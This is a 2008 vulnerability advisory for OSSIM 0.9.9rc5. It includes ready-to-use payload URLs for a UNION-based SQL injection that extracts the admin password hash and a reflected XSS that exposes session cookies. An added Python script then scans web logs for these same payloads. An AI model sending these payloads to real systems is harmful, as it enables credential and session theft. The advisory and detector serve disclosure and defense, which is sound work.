SQL-injection, XSS in OSSIM (Open Source Security Information Management)

2008-02-22 / 2008-02-23
Credit: Marcin Kopec
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

Application: OSSIM http://www.ossim.net
Version: 0.9.9rc5
Note: it is possible that the problem also affects earlier OSSIM versions
Platforms: Linux
Bug: SQL injection, Cross Site Scripting
Exploitation: remote
Date: 21 Feb 2008
Author: Marcin Kopec
E-mail: marcin(dot)kopec(at)hotmail(dot)com

---------------------------------------

1) Introduction

OSSIM is a free implementation of a Security Information Management (SIM) system, equipped with many useful security tools (nessus, snort, p0f, ntop, ...) managed from an easy-to-use web panel.

2) SQL injection

The bug exists in the portname parameter of modifyportform.php. It is possible to obtain the hashed administrator password when the user has rights to modify ports in the "PORTS" tab.

http://[host]/ossim/port/modifyportform.php?portname=ANY'%20and%201=2%20union%20select%20pass,2%20from%20ossim.users%20where%20login='admin

3) XSS

Quotes in OSSIM aren't properly sanitized. The XSS below may be executed without logging into OSSIM.

http://[host]/ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--
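Added example (not part of the original advisory or of OSSIM): a Python check that scans web-server access logs for requests matching the two issues above, that is, a quote or UNION ... SELECT in portname on modifyportform.php and HTML metacharacters in dest on login.php. The log lines, addresses, matching patterns and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Path suffix -> (parameter named in the advisory, pattern a legitimate value
# should not need, finding label). The patterns are assumptions of this example.
RULES = {
    "/port/modifyportform.php": ("portname", re.compile(r"'|\bunion\b.+\bselect\b", re.I | re.S), "sqli"),
    "/session/login.php": ("dest", re.compile(r"[<>\"]"), "xss"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Feb/2008:10:00:01 +0100] "GET /ossim/port/modifyportform.php?portname=HTTP HTTP/1.1" 200 812',
    '192.0.2.44 - - [21/Feb/2008:10:02:13 +0100] "GET /ossim/port/modifyportform.php?portname=ANY\'%20and%201=2%20union%20select%20pass,2%20from%20ossim.users%20where%20login=\'admin HTTP/1.1" 200 845',
    '192.0.2.44 - - [21/Feb/2008:10:03:40 +0100] "GET /ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!-- HTTP/1.1" 200 1530',
    '192.0.2.10 - - [21/Feb/2008:10:05:02 +0100] "GET /ossim/session/login.php?dest=%2Fossim%2Findex.php HTTP/1.1" 200 1498',
]

def fully_decode(value, rounds=3):
    """Normalize repeated percent-encoding before matching (e.g. %2527 -> ')."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(log_lines):
    """Return (line_number, label, decoded_value) for each suspicious request."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line this example understands
        url = urlsplit(match.group(1))
        for suffix, (param, pattern, label) in RULES.items():
            if not url.path.endswith(suffix):
                continue
            for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
                value = fully_decode(value)
                if pattern.search(value):
                    findings.append((number, label, value))
    return findings

if __name__ == "__main__":
    for number, label, value in scan(SAMPLE_LOG):
        print(f"line {number}: {label}: {value!r}")
```

Only GET query strings are visible in access logs; parameters sent in a POST body need request-body logging or a WAF rule to be covered.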

